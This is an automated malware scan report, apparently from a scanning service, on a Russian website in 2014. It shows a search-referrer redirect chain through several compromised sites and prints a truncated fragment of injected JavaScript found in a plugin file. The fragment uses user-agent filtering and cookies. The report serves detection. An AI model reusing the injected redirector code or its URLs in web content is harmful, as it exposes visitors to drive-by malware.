Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=studio-ideas.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://studio-ideas.ru/
Result: The website is marked by Yandex as suspicious. - visiting this web site may harm your computer.
Details are available here.
Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://studio-ideas.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: studio-ideas.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Connection: close Date: Sun, 29 Jun 2014 18:34:07 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: nginx/1.2.9 Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=utf-8 X-Powered-By: PHP/5.3.27 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 29 Jun 2014 18:34:07 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 29 Jun 2014 18:34:07 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Sun, 29 Jun 2014 18:34:08 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://studio-ideas.ru/ | 200 OK Content-Length: 22687 Content-Type: text/html | clean |
http://studio-ideas.ru/media/system/js/caption.js | 200 OK Content-Length: 1963 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/media/widgetkit/js/jquery.js | 200 OK Content-Length: 95228 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/cache/widgetkit/widgetkit-030a0d94.js | 200 OK Content-Length: 18781 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/modules/mod_news_pro_gk1/scripts/engine_standard_compressed.js | 200 OK Content-Length: 1667 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/plugins/system/jcemediabox/js/jcemediabox.js?version=116 | 200 OK Content-Length: 51877 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/plugins/system/jcemediabox/addons/twitter-src.js?version=116 | 200 OK Content-Length: 1203 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function zzz_check_ua(){ var blackList = ['Linux','Macintosh','FreeBSD','Chrome','iPad','iPhone','IEMobile','Chromium','Android','Firefox/18.0','Firefox/18.0.1','Firefox/18.0.2','Firef document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString(); } function getCookie(name) { var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" )); return matches ? decodeURIComponent(matches[1]) : undefined; } if (!zzz_check_ua()) { var cookie = getCookie('v2005ba33'); if (cookie == undefined) { setCookie(
Antivirus reports:
http://studio-ideas.ru/plugins/system/jcemediabox/addons/twitter.js?version=116 | 200 OK Content-Length: 41 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/plugins/system/yoo_effects/yoo_effects.js.php?lb=1&re=1&sl=1 | 200 OK Content-Length: 32395 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/templates/Studio-ideas/js/smoothsc.js | 200 OK Content-Length: 1858 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/templates/Studio-ideas/js/cufon-yui.js | 200 OK Content-Length: 18258 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru/templates/Studio-ideas/js/cufon-replace.js | 200 OK Content-Length: 608 Content-Type: application/x-javascript | clean |
http://studio-ideas.ru//plugins/system/u24/lytebox/3.22/lytebox.js/ | 404 Not Found Content-Length: 328 Content-Type: text/html | clean |
http://studio-ideas.ru/test404page.js | 404 Not Found Content-Length: 299 Content-Type: text/html | clean |